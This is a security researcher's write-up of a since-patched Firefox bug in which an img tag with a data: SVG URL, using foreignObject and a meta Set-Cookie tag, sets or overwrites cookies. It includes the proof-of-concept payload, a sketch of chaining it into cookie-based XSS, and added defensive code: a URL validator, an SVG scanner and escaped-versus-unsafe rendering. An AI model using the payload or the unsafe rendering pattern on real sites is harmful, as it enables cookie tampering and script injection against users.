
Curious Case of Benjamin Cookie

TLDR : <img src="data:image/svg+xml,...http-equiv='Set-Cookie'..."> can create/modify cookies

!! This payload no longer works.
Link - https://tools.ietf.org/html/draft-ietf-httpstate-cookie-14
Last check :
Date : Mar 17th 2017
Browser tested : Firefox/51.0
User-Agent : Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:51.0) Gecko/20100101 Firefox/51.0

POC :

<img src="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg'>
<circle r='100'></circle>
<foreignObject>
<html xmlns='http://www.w3.org/1999/xhtml'>
<meta http-equiv='Set-Cookie' content='ppp=qqq' />
</html>
</foreignObject>
</svg>">

Link : https://dr4cun0.com/POCs/bc.html

The src attribute of an img tag invokes the XML parser when an .svg file is loaded.

Example : <img src="cookie.svg">

This invokes the XML parser, and the contents of cookie.svg are rendered once the XML syntax has been validated.

The SVG element 'foreignObject' then invokes the HTML parser and renders the content of the element as HTML.

The foreignObject SVG element includes elements from a different XML namespace. In the context of a browser, it is most likely (X)HTML.

This allows HTML to be rendered from the `src` attribute of an img tag, but script execution is prohibited for content loaded through this attribute, so any script included in the HTML content is not executed.

The meta HTML element is still rendered by the HTML parser, though, and its http-equiv attribute can then be used to simulate an HTTP response header. The allowed headers are :

  1. content-language
  2. content-security-policy
  3. content-type
  4. refresh
  5. set-cookie

set-cookie is then used to set or modify cookie.

<meta http-equiv='Set-Cookie' content='ppp=qqq' />

Connecting above steps :

<svg xmlns='http://www.w3.org/2000/svg'>
<circle r='100'></circle>
<foreignObject>
<html xmlns='http://www.w3.org/1999/xhtml'>
<meta http-equiv='Set-Cookie' content='ppp=qqq' />
</html>
</foreignObject>
</svg>

Therefore, if a web application does not validate the image URL and an attacker can supply an arbitrary string, this can allow creating new cookies or modifying existing cookies.
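Two server-side checks that address the condition above, as an added example that is not part of the original post: an image URL validator that only accepts plain http(s) URLs (so a data: URL carrying inline SVG is rejected before it reaches an img src), and a scanner for uploaded SVG files that flags the foreignObject and meta http-equiv constructs the technique relies on. The function names and sample inputs are assumptions constructed for this example.

```javascript
// Added example (not from the original post). Assumed names:
// isAllowedImageUrl, findRiskySvgMarkup; all sample inputs are constructed.

// Accept only absolute http(s) URLs. Relative strings, malformed input and
// every other scheme (data:, javascript:, blob:, ...) are rejected, so an
// inline SVG document can never be smuggled into <img src>.
function isAllowedImageUrl(candidate) {
  let parsed;
  try {
    parsed = new URL(candidate); // throws on relative or malformed input
  } catch (e) {
    return false;
  }
  return parsed.protocol === 'http:' || parsed.protocol === 'https:';
}

// For SVG files the application hosts itself: report the markup that lets an
// SVG carry HTML and simulated response headers. Returns an array of finding
// strings; an empty array means none of the patterns matched.
function findRiskySvgMarkup(svgText) {
  const findings = [];
  if (/<foreignObject\b/i.test(svgText)) {
    findings.push('foreignObject element');
  }
  if (/<meta\b[^>]*http-equiv\s*=/i.test(svgText)) {
    findings.push('meta http-equiv');
  }
  if (/<meta\b[^>]*http-equiv\s*=\s*['"]?set-cookie/i.test(svgText)) {
    findings.push('meta Set-Cookie');
  }
  return findings;
}

// Constructed samples: the post's payload shape, and a benign SVG.
const SAMPLE_SVG =
  "<svg xmlns='http://www.w3.org/2000/svg'><circle r='100'></circle>" +
  "<foreignObject><html xmlns='http://www.w3.org/1999/xhtml'>" +
  "<meta http-equiv='Set-Cookie' content='ppp=qqq' /></html></foreignObject></svg>";
const SAMPLE_DATA_URL = 'data:image/svg+xml,' + SAMPLE_SVG;
const BENIGN_SVG =
  "<svg xmlns='http://www.w3.org/2000/svg'><circle r='100'></circle></svg>";

console.log('https URL allowed:', isAllowedImageUrl('https://example.com/cookie.svg'));
console.log('data URL allowed:', isAllowedImageUrl(SAMPLE_DATA_URL));
console.log('relative path allowed:', isAllowedImageUrl('cookie.svg'));
console.log('findings for sample:', findRiskySvgMarkup(SAMPLE_SVG));
console.log('findings for benign:', findRiskySvgMarkup(BENIGN_SVG));
```

The URL check is deliberately an allow-list on scheme rather than a deny-list on `data:`; the SVG scanner is a regex triage step, so it is meant to reject or quarantine uploads for review, not to replace a real SVG sanitizer.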

Exploitable scenario : a web application reads the value of the cookie 'username' and injects it into the DOM without sanitization. If the 'username' cookie can be modified to hold an XSS payload, this leads to JavaScript execution in other users' browsers.
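The scenario above, as an added example that is not part of the original post: a minimal Cookie header parser, the vulnerable rendering pattern (the cookie value concatenated straight into markup) beside the hardened form that HTML-encodes the value first. The function names and the constructed cookie string are assumptions for this example, not the vulnerable application's code.

```javascript
// Added example (not from the original post). Assumed names: parseCookies,
// escapeHtml, renderGreetingUnsafe, renderGreetingSafe; input is constructed.

// Minimal parser for a Cookie request header ("name=value; name2=value2").
// Here the first occurrence of a name wins; values are kept verbatim.
function parseCookies(cookieHeader) {
  const jar = {};
  for (const part of cookieHeader.split(';')) {
    const eq = part.indexOf('=');
    if (eq < 0) continue;
    const name = part.slice(0, eq).trim();
    const value = part.slice(eq + 1).trim();
    if (name && !(name in jar)) jar[name] = value;
  }
  return jar;
}

// Vulnerable pattern: whatever is in the cookie becomes markup, so a cookie
// value planted via the technique in the post is rendered as HTML.
function renderGreetingUnsafe(cookieHeader) {
  const name = parseCookies(cookieHeader).username || 'guest';
  return '<p>Hello, ' + name + '</p>';
}

// Encode the five characters that can change HTML structure or attributes.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened pattern: the cookie value is treated as text. In a browser the
// equivalent is assigning the value to element.textContent, never innerHTML.
function renderGreetingSafe(cookieHeader) {
  const name = parseCookies(cookieHeader).username || 'guest';
  return '<p>Hello, ' + escapeHtml(name) + '</p>';
}

// Constructed cookie header with markup in the username value.
const CONSTRUCTED_COOKIE = 'username=<b>alice</b>; ppp=qqq';

console.log('unsafe:', renderGreetingUnsafe(CONSTRUCTED_COOKIE));
console.log('safe:  ', renderGreetingSafe(CONSTRUCTED_COOKIE));
```

The encoding belongs at the point where the value is placed into HTML, not when the cookie is read: the same cookie may later be used in a different context (a JSON body, a log line) that needs a different encoding.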

Reported vulnerability :

  1. https://hackerone.com/reports/213991
